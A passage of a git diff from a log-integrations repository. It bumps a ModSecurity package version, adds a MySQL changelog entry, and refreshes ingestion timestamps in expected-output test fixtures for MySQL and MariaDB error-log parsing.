must-revalidate\",\"ETag\":\"W/\\\"f7e5c631964147f2a3458c4f97647883\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:18 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.026203\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx 
v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" ], diff --git a/packages/modsecurity/manifest.yml b/packages/modsecurity/manifest.yml index 8aec54718f4..daf276bcab7 100644 --- a/packages/modsecurity/manifest.yml +++ b/packages/modsecurity/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: modsecurity title: "ModSecurity Audit" -version: 0.1.1 +version: 0.1.2 license: basic description: "ModSecuirty Audit Log Integration" type: integration diff --git a/packages/mysql/changelog.yml b/packages/mysql/changelog.yml index 33aca2a9b90..1d663081d86 100644 --- a/packages/mysql/changelog.yml +++ b/packages/mysql/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Release package for v8.0.0 diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-error.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-error.log-expected.json index fbc80f1cc2c..787458364fa 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-error.log-expected.json 
+++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-error.log-expected.json @@ -4,7 +4,7 @@ "@timestamp": "2016-12-09T13:08:33.000Z", "message": "mysqld_safe Starting mysqld daemon with databases from /usr/local/var/mysql", "event": { - "ingested": "2021-06-21T12:35:16.955301274Z", + "ingested": "2021-12-09T13:41:32.752808400Z", "category": [ "database" ], @@ -25,7 +25,7 @@ }, "message": "TIMESTAMP with implicit DEFAULT value is deprecated. Please use --explicit_defaults_for_timestamp server option (see documentation for more details).", "event": { - "ingested": "2021-06-21T12:35:16.955304679Z", + "ingested": "2021-12-09T13:41:32.752817300Z", "category": [ "database" ], @@ -46,7 +46,7 @@ }, "message": "Insecure configuration for --secure-file-priv: Current value does not restrict location of generated files. Consider setting it to a valid, non-empty path.", "event": { - "ingested": "2021-06-21T12:35:16.955305338Z", + "ingested": "2021-12-09T13:41:32.752823300Z", "category": [ "database" ], @@ -67,7 +67,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld (mysqld 5.7.10) starting as process 61571 ...", "event": { - "ingested": "2021-06-21T12:35:16.955305836Z", + "ingested": "2021-12-09T13:41:32.752828900Z", "category": [ "database" ], @@ -88,7 +88,7 @@ }, "message": "Setting lower_case_table_names=2 because file system for /usr/local/var/mysql/ is case insensitive", "event": { - "ingested": "2021-06-21T12:35:16.955306317Z", + "ingested": "2021-12-09T13:41:32.752834500Z", "category": [ "database" ], @@ -109,7 +109,7 @@ }, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:16.955306806Z", + "ingested": "2021-12-09T13:41:32.752840100Z", "category": [ "database" ], 
@@ -130,7 +130,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:16.955307285Z", + "ingested": "2021-12-09T13:41:32.752845800Z", "category": [ "database" ], @@ -144,7 +144,7 @@ { "message": "Version: '5.7.10' socket: '/tmp/mysql.sock' port: 3306 Homebrew", "event": { - "ingested": "2021-06-21T12:35:16.955307777Z", + "ingested": "2021-12-09T13:41:32.752851400Z", "category": [ "database" ], @@ -165,7 +165,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 772568ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:16.955308261Z", + "ingested": "2021-12-09T13:41:32.752857100Z", "category": [ "database" ], @@ -183,7 +183,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:16.955308746Z", + "ingested": "2021-12-09T13:41:32.752862800Z", "category": [ "database" ], @@ -201,7 +201,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:16.955309232Z", + "ingested": "2021-12-09T13:41:32.752868500Z", "category": [ "database" ], @@ -216,7 +216,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:16.955309894Z", + "ingested": "2021-12-09T13:41:32.752874600Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mariadb-10-4-8.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mariadb-10-4-8.log-expected.json index edd7fc53e6b..592df9c2e13 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mariadb-10-4-8.log-expected.json 
+++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mariadb-10-4-8.log-expected.json @@ -7,7 +7,7 @@ }, "message": "Query\tSHOW /*!50002 GLOBAL */ STATUS", "event": { - "ingested": "2021-06-21T12:35:17.024535715Z", + "ingested": "2021-12-09T13:41:32.856137800Z", "category": [ "database" ], @@ -28,7 +28,7 @@ }, "message": "InnoDB: Using Linux native AIO", "event": { - "ingested": "2021-06-21T12:35:17.024538668Z", + "ingested": "2021-12-09T13:41:32.856147200Z", "category": [ "database" ], @@ -49,7 +49,7 @@ }, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:17.024539277Z", + "ingested": "2021-12-09T13:41:32.856153400Z", "category": [ "database" ], @@ -70,7 +70,7 @@ }, "message": "InnoDB: Uses event mutexes", "event": { - "ingested": "2021-06-21T12:35:17.024539789Z", + "ingested": "2021-12-09T13:41:32.856159300Z", "category": [ "database" ], @@ -91,7 +91,7 @@ }, "message": "InnoDB: Compressed tables use zlib 1.2.7", "event": { - "ingested": "2021-06-21T12:35:17.024540289Z", + "ingested": "2021-12-09T13:41:32.856165Z", "category": [ "database" ], @@ -112,7 +112,7 @@ }, "message": "InnoDB: Number of pools: 1", "event": { - "ingested": "2021-06-21T12:35:17.024540789Z", + "ingested": "2021-12-09T13:41:32.856170700Z", "category": [ "database" ], @@ -133,7 +133,7 @@ }, "message": "InnoDB: Using SSE2 crc32 instructions", "event": { - "ingested": "2021-06-21T12:35:17.024541291Z", + "ingested": "2021-12-09T13:41:32.856176500Z", "category": [ "database" ], @@ -154,7 +154,7 @@ }, "message": "InnoDB: Initializing buffer pool, total size = 128M, instances = 1, chunk size = 128M", "event": { - "ingested": "2021-06-21T12:35:17.024541793Z", + "ingested": "2021-12-09T13:41:32.856182500Z", "category": [ "database" ], 
@@ -175,7 +175,7 @@ }, "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:17.024542299Z", + "ingested": "2021-12-09T13:41:32.856188500Z", "category": [ "database" ], @@ -196,7 +196,7 @@ }, "message": "InnoDB: If the mysqld execution user is authorized, page cleaner thread priority can be changed. See the man page of setpriority().", "event": { - "ingested": "2021-06-21T12:35:17.024542800Z", + "ingested": "2021-12-09T13:41:32.856192Z", "category": [ "database" ], @@ -217,7 +217,7 @@ }, "message": "InnoDB: 128 out of 128 rollback segments are active.", "event": { - "ingested": "2021-06-21T12:35:17.024543296Z", + "ingested": "2021-12-09T13:41:32.856196600Z", "category": [ "database" ], @@ -238,7 +238,7 @@ }, "message": "InnoDB: Creating shared tablespace for temporary tables", "event": { - "ingested": "2021-06-21T12:35:17.024543963Z", + "ingested": "2021-12-09T13:41:32.856202Z", "category": [ "database" ], @@ -259,7 +259,7 @@ }, "message": "InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...", "event": { - "ingested": "2021-06-21T12:35:17.024544466Z", + "ingested": "2021-12-09T13:41:32.856207100Z", "category": [ "database" ], @@ -280,7 +280,7 @@ }, "message": "InnoDB: File './ibtmp1' size is now 12 MB.", "event": { - "ingested": "2021-06-21T12:35:17.024544980Z", + "ingested": "2021-12-09T13:41:32.856211100Z", "category": [ "database" ], @@ -301,7 +301,7 @@ }, "message": "InnoDB: Waiting for purge to start", "event": { - "ingested": "2021-06-21T12:35:17.024545484Z", + "ingested": "2021-12-09T13:41:32.856218200Z", "category": [ "database" ], @@ -322,7 +322,7 @@ }, "message": "InnoDB: 10.4.8 started; log sequence number 1631101; transaction id 791", "event": { - "ingested": "2021-06-21T12:35:17.024545985Z", + "ingested": "2021-12-09T13:41:32.856222800Z", "category": [ "database" ], 
@@ -343,7 +343,7 @@ }, "message": "InnoDB: Loading buffer pool(s) from /data/mysqldata/mysql/ib_buffer_pool", "event": { - "ingested": "2021-06-21T12:35:17.024546625Z", + "ingested": "2021-12-09T13:41:32.856229Z", "category": [ "database" ], @@ -364,7 +364,7 @@ }, "message": "Plugin 'FEEDBACK' is disabled.", "event": { - "ingested": "2021-06-21T12:35:17.024547127Z", + "ingested": "2021-12-09T13:41:32.856233500Z", "category": [ "database" ], @@ -385,7 +385,7 @@ }, "message": "InnoDB: Buffer pool(s) load completed at 191016 17:24:15", "event": { - "ingested": "2021-06-21T12:35:17.024547631Z", + "ingested": "2021-12-09T13:41:32.856237800Z", "category": [ "database" ], @@ -406,7 +406,7 @@ }, "message": "Server socket created on IP: '::'.", "event": { - "ingested": "2021-06-21T12:35:17.024548206Z", + "ingested": "2021-12-09T13:41:32.856242300Z", "category": [ "database" ], @@ -427,7 +427,7 @@ }, "message": "Reading of all Master_info entries succeeded", "event": { - "ingested": "2021-06-21T12:35:17.024548703Z", + "ingested": "2021-12-09T13:41:32.856247100Z", "category": [ "database" ], @@ -448,7 +448,7 @@ }, "message": "Added new Master_info '' to hash table", "event": { - "ingested": "2021-06-21T12:35:17.024549206Z", + "ingested": "2021-12-09T13:41:32.856252Z", "category": [ "database" ], @@ -469,7 +469,7 @@ }, "message": "/usr/sbin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:17.024549697Z", + "ingested": "2021-12-09T13:41:32.856257800Z", "category": [ "database" ], @@ -483,7 +483,7 @@ { "message": "Version: '10.4.8-MariaDB-log' socket: '/data/mysqldata/mysql.sock' port: 3306 MariaDB Server", "event": { - "ingested": "2021-06-21T12:35:17.024550325Z", + "ingested": "2021-12-09T13:41:32.856263800Z", "category": [ "database" ], 
@@ -504,7 +504,7 @@ }, "message": "Event Scheduler: scheduler thread started with id 11", "event": { - "ingested": "2021-06-21T12:35:17.024550829Z", + "ingested": "2021-12-09T13:41:32.856269500Z", "category": [ "database" ], @@ -525,7 +525,7 @@ }, "message": "Event Scheduler: Last execution of test.test_error_log. Dropping.", "event": { - "ingested": "2021-06-21T12:35:17.024551329Z", + "ingested": "2021-12-09T13:41:32.856275300Z", "category": [ "database" ], @@ -546,7 +546,7 @@ }, "message": "Event Scheduler: Dropping test.test_error_log", "event": { - "ingested": "2021-06-21T12:35:17.024551830Z", + "ingested": "2021-12-09T13:41:32.856281100Z", "category": [ "database" ], @@ -567,7 +567,7 @@ }, "message": "Event Scheduler: [root@localhost][test.test_error_log] hi from the error log", "event": { - "ingested": "2021-06-21T12:35:17.024552326Z", + "ingested": "2021-12-09T13:41:32.856286900Z", "category": [ "database" ], @@ -589,7 +589,7 @@ }, "message": "Event Scheduler: [root@localhost][test.test_error_log] At line 1 in test.test_error_log", "event": { - "ingested": "2021-06-21T12:35:17.024552826Z", + "ingested": "2021-12-09T13:41:32.856292700Z", "category": [ "database" ], @@ -603,7 +603,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:17.024553322Z", + "ingested": "2021-12-09T13:41:32.856298600Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json index c1ed4e3e2db..41717b86c92 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json +++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json 
@@ -4,7 +4,7 @@ "@timestamp": "2016-12-09T13:08:33.000Z", "message": "mysqld_safe Starting mysqld daemon with databases from /usr/local/var/mysql", "event": { - "ingested": "2021-06-21T12:35:17.188528056Z", + "ingested": "2021-12-09T13:41:33.114509700Z", "category": [ "database" ], @@ -25,7 +25,7 @@ }, "message": "TIMESTAMP with implicit DEFAULT value is deprecated. Please use --explicit_defaults_for_timestamp server option (see documentation for more details).", "event": { - "ingested": "2021-06-21T12:35:17.188530549Z", + "ingested": "2021-12-09T13:41:33.114519Z", "category": [ "database" ], @@ -46,7 +46,7 @@ }, "message": "Insecure configuration for --secure-file-priv: Current value does not restrict location of generated files. Consider setting it to a valid, non-empty path.", "event": { - "ingested": "2021-06-21T12:35:17.188531062Z", + "ingested": "2021-12-09T13:41:33.114522800Z", "category": [ "database" ], @@ -67,7 +67,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld (mysqld 5.7.10) starting as process 61571 ...", "event": { - "ingested": "2021-06-21T12:35:17.188531515Z", + "ingested": "2021-12-09T13:41:33.114527500Z", "category": [ "database" ], @@ -88,7 +88,7 @@ }, "message": "Setting lower_case_table_names=2 because file system for /usr/local/var/mysql/ is case insensitive", "event": { - "ingested": "2021-06-21T12:35:17.188531968Z", + "ingested": "2021-12-09T13:41:33.114533200Z", "category": [ "database" ], @@ -109,7 +109,7 @@ }, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:17.188532414Z", + "ingested": "2021-12-09T13:41:33.114539100Z", "category": [ "database" ], @@ -130,7 +130,7 @@ }, "message": "InnoDB: Uses event mutexes", "event": { - "ingested": "2021-06-21T12:35:17.188532867Z", + "ingested": "2021-12-09T13:41:33.114545100Z", "category": [ "database" ], 
@@ -151,7 +151,7 @@ }, "message": "InnoDB: GCC builtin __atomic_thread_fence() is used for memory barrier", "event": { - "ingested": "2021-06-21T12:35:17.188533346Z", + "ingested": "2021-12-09T13:41:33.114550900Z", "category": [ "database" ], @@ -172,7 +172,7 @@ }, "message": "InnoDB: Compressed tables use zlib 1.2.3", "event": { - "ingested": "2021-06-21T12:35:17.188533926Z", + "ingested": "2021-12-09T13:41:33.114556600Z", "category": [ "database" ], @@ -193,7 +193,7 @@ }, "message": "InnoDB: Number of pools: 1", "event": { - "ingested": "2021-06-21T12:35:17.188534381Z", + "ingested": "2021-12-09T13:41:33.114562400Z", "category": [ "database" ], @@ -214,7 +214,7 @@ }, "message": "InnoDB: Using CPU crc32 instructions", "event": { - "ingested": "2021-06-21T12:35:17.188534892Z", + "ingested": "2021-12-09T13:41:33.114568200Z", "category": [ "database" ], @@ -235,7 +235,7 @@ }, "message": "InnoDB: Initializing buffer pool, total size = 128M, instances = 1, chunk size = 128M", "event": { - "ingested": "2021-06-21T12:35:17.188535529Z", + "ingested": "2021-12-09T13:41:33.114575700Z", "category": [ "database" ], @@ -256,7 +256,7 @@ }, "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:17.188535990Z", + "ingested": "2021-12-09T13:41:33.114581800Z", "category": [ "database" ], @@ -277,7 +277,7 @@ }, "message": "InnoDB: Highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:17.188536444Z", + "ingested": "2021-12-09T13:41:33.114587600Z", "category": [ "database" ], @@ -298,7 +298,7 @@ }, "message": "InnoDB: Log scan progressed past the checkpoint lsn 2498863", "event": { - "ingested": "2021-06-21T12:35:17.188536972Z", + "ingested": "2021-12-09T13:41:33.114593500Z", "category": [ "database" ], 
@@ -319,7 +319,7 @@ }, "message": "InnoDB: Doing recovery: scanned up to log sequence number 2498872", "event": { - "ingested": "2021-06-21T12:35:17.188537533Z", + "ingested": "2021-12-09T13:41:33.114599300Z", "category": [ "database" ], @@ -340,7 +340,7 @@ }, "message": "InnoDB: Doing recovery: scanned up to log sequence number 2498872", "event": { - "ingested": "2021-06-21T12:35:17.188538111Z", + "ingested": "2021-12-09T13:41:33.114605400Z", "category": [ "database" ], @@ -361,7 +361,7 @@ }, "message": "InnoDB: Database was not shutdown normally!", "event": { - "ingested": "2021-06-21T12:35:17.188538567Z", + "ingested": "2021-12-09T13:41:33.114625600Z", "category": [ "database" ], @@ -382,7 +382,7 @@ }, "message": "InnoDB: Starting crash recovery.", "event": { - "ingested": "2021-06-21T12:35:17.188539106Z", + "ingested": "2021-12-09T13:41:33.114630700Z", "category": [ "database" ], @@ -403,7 +403,7 @@ }, "message": "InnoDB: Removed temporary tablespace data file: \"ibtmp1\"", "event": { - "ingested": "2021-06-21T12:35:17.188539571Z", + "ingested": "2021-12-09T13:41:33.114635900Z", "category": [ "database" ], @@ -424,7 +424,7 @@ }, "message": "InnoDB: Creating shared tablespace for temporary tables", "event": { - "ingested": "2021-06-21T12:35:17.188540023Z", + "ingested": "2021-12-09T13:41:33.114641Z", "category": [ "database" ], @@ -445,7 +445,7 @@ }, "message": "InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...", "event": { - "ingested": "2021-06-21T12:35:17.188540548Z", + "ingested": "2021-12-09T13:41:33.114645500Z", "category": [ "database" ], @@ -466,7 +466,7 @@ }, "message": "InnoDB: File './ibtmp1' size is now 12 MB.", "event": { - "ingested": "2021-06-21T12:35:17.188541075Z", + "ingested": "2021-12-09T13:41:33.114649700Z", "category": [ "database" ], 
@@ -487,7 +487,7 @@ }, "message": "InnoDB: 96 redo rollback segment(s) found. 96 redo rollback segment(s) are active.", "event": { - "ingested": "2021-06-21T12:35:17.188541647Z", + "ingested": "2021-12-09T13:41:33.114653900Z", "category": [ "database" ], @@ -508,7 +508,7 @@ }, "message": "InnoDB: 32 non-redo rollback segment(s) are active.", "event": { - "ingested": "2021-06-21T12:35:17.188542099Z", + "ingested": "2021-12-09T13:41:33.114675200Z", "category": [ "database" ], @@ -529,7 +529,7 @@ }, "message": "InnoDB: Waiting for purge to start", "event": { - "ingested": "2021-06-21T12:35:17.188542551Z", + "ingested": "2021-12-09T13:41:33.114680100Z", "category": [ "database" ], @@ -550,7 +550,7 @@ }, "message": "InnoDB: 5.7.10 started; log sequence number 2498872", "event": { - "ingested": "2021-06-21T12:35:17.188543011Z", + "ingested": "2021-12-09T13:41:33.114686100Z", "category": [ "database" ], @@ -571,7 +571,7 @@ }, "message": "InnoDB: Loading buffer pool(s) from /usr/local/var/mysql/ib_buffer_pool", "event": { - "ingested": "2021-06-21T12:35:17.188543477Z", + "ingested": "2021-12-09T13:41:33.114692100Z", "category": [ "database" ], @@ -592,7 +592,7 @@ }, "message": "InnoDB: not started", "event": { - "ingested": "2021-06-21T12:35:17.188543937Z", + "ingested": "2021-12-09T13:41:33.114698Z", "category": [ "database" ], @@ -613,7 +613,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:17.188544453Z", + "ingested": "2021-12-09T13:41:33.114703800Z", "category": [ "database" ], @@ -634,7 +634,7 @@ }, "message": "InnoDB: Buffer pool(s) load completed at 161209 13:08:33", "event": { - "ingested": "2021-06-21T12:35:17.188544910Z", + "ingested": "2021-12-09T13:41:33.114709800Z", "category": [ "database" ], 
@@ -655,7 +655,7 @@ }, "message": "Found ca.pem, server-cert.pem and server-key.pem in data directory. Trying to enable SSL support using them.", "event": { - "ingested": "2021-06-21T12:35:17.188545365Z", + "ingested": "2021-12-09T13:41:33.114715600Z", "category": [ "database" ], @@ -676,7 +676,7 @@ }, "message": "Skipping generation of SSL certificates as certificate files are present in data directory.", "event": { - "ingested": "2021-06-21T12:35:17.188545832Z", + "ingested": "2021-12-09T13:41:33.114721600Z", "category": [ "database" ], @@ -697,7 +697,7 @@ }, "message": "CA certificate ca.pem is self signed.", "event": { - "ingested": "2021-06-21T12:35:17.188546293Z", + "ingested": "2021-12-09T13:41:33.114727500Z", "category": [ "database" ], @@ -718,7 +718,7 @@ }, "message": "Skipping generation of RSA key pair as key files are present in data directory.", "event": { - "ingested": "2021-06-21T12:35:17.188546865Z", + "ingested": "2021-12-09T13:41:33.114733600Z", "category": [ "database" ], @@ -739,7 +739,7 @@ }, "message": "Server hostname (bind-address): '*'; port: 3306", "event": { - "ingested": "2021-06-21T12:35:17.188547403Z", + "ingested": "2021-12-09T13:41:33.114739500Z", "category": [ "database" ], @@ -760,7 +760,7 @@ }, "message": "IPv6 is available.", "event": { - "ingested": "2021-06-21T12:35:17.188547935Z", + "ingested": "2021-12-09T13:41:33.114745500Z", "category": [ "database" ], @@ -781,7 +781,7 @@ }, "message": "- '::' resolves to '::';", "event": { - "ingested": "2021-06-21T12:35:17.188550521Z", + "ingested": "2021-12-09T13:41:33.114751400Z", "category": [ "database" ], @@ -802,7 +802,7 @@ }, "message": "Server socket created on IP: '::'.", "event": { - "ingested": "2021-06-21T12:35:17.188551066Z", + "ingested": "2021-12-09T13:41:33.114757300Z", "category": [ "database" ], 
@@ -823,7 +823,7 @@ }, "message": "Event Scheduler: Loaded 0 events", "event": { - "ingested": "2021-06-21T12:35:17.188551526Z", + "ingested": "2021-12-09T13:41:33.114762500Z", "category": [ "database" ], @@ -844,7 +844,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:17.188551981Z", + "ingested": "2021-12-09T13:41:33.114766Z", "category": [ "database" ], @@ -858,7 +858,7 @@ { "message": "Version: '5.7.10' socket: '/tmp/mysql.sock' port: 3306 Homebrew", "event": { - "ingested": "2021-06-21T12:35:17.188552441Z", + "ingested": "2021-12-09T13:41:33.114770700Z", "category": [ "database" ], @@ -879,7 +879,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 772568ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188552896Z", + "ingested": "2021-12-09T13:41:33.114776400Z", "category": [ "database" ], @@ -900,7 +900,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 898642ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188553490Z", + "ingested": "2021-12-09T13:41:33.114781400Z", "category": [ "database" ], @@ -921,7 +921,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3596603ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188553947Z", + "ingested": "2021-12-09T13:41:33.114785900Z", "category": [ "database" ], @@ -942,7 +942,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 2371678ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188554393Z", + "ingested": "2021-12-09T13:41:33.114789900Z", "category": [ "database" ], 
@@ -963,7 +963,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597590ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188554848Z", + "ingested": "2021-12-09T13:41:33.114794100Z", "category": [ "database" ], @@ -984,7 +984,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1173583ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188555312Z", + "ingested": "2021-12-09T13:41:33.114797700Z", "category": [ "database" ], @@ -1005,7 +1005,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597610ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188555767Z", + "ingested": "2021-12-09T13:41:33.114802300Z", "category": [ "database" ], @@ -1026,7 +1026,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515469ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188556296Z", + "ingested": "2021-12-09T13:41:33.114808200Z", "category": [ "database" ], @@ -1047,7 +1047,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 2059611ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188557Z", + "ingested": "2021-12-09T13:41:33.114814400Z", "category": [ "database" ], @@ -1068,7 +1068,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597614ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188557454Z", + "ingested": "2021-12-09T13:41:33.114820500Z", "category": [ "database" ], 
@@ -1089,7 +1089,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515589ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188557913Z", + "ingested": "2021-12-09T13:41:33.114826300Z", "category": [ "database" ], @@ -1110,7 +1110,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 246613ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188558374Z", + "ingested": "2021-12-09T13:41:33.114832300Z", "category": [ "database" ], @@ -1131,7 +1131,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598614ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188558822Z", + "ingested": "2021-12-09T13:41:33.114838300Z", "category": [ "database" ], @@ -1152,7 +1152,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3595608ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188559439Z", + "ingested": "2021-12-09T13:41:33.114844300Z", "category": [ "database" ], @@ -1173,7 +1173,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 258594ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188559986Z", + "ingested": "2021-12-09T13:41:33.114850200Z", "category": [ "database" ], @@ -1194,7 +1194,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598632ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188560455Z", + "ingested": "2021-12-09T13:41:33.114856100Z", "category": [ "database" ], 
@@ -1215,7 +1215,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515603ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188560905Z", + "ingested": "2021-12-09T13:41:33.114862100Z", "category": [ "database" ], @@ -1236,7 +1236,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597607ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188561363Z", + "ingested": "2021-12-09T13:41:33.114868Z", "category": [ "database" ], @@ -1257,7 +1257,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515633ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188561822Z", + "ingested": "2021-12-09T13:41:33.114873900Z", "category": [ "database" ], @@ -1278,7 +1278,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597617ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188562281Z", + "ingested": "2021-12-09T13:41:33.114879800Z", "category": [ "database" ], @@ -1299,7 +1299,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 514638ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188562741Z", + "ingested": "2021-12-09T13:41:33.114885700Z", "category": [ "database" ], @@ -1320,7 +1320,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3595614ms. The settings might not be optimal. (flushed=0 and evicted=0, during the 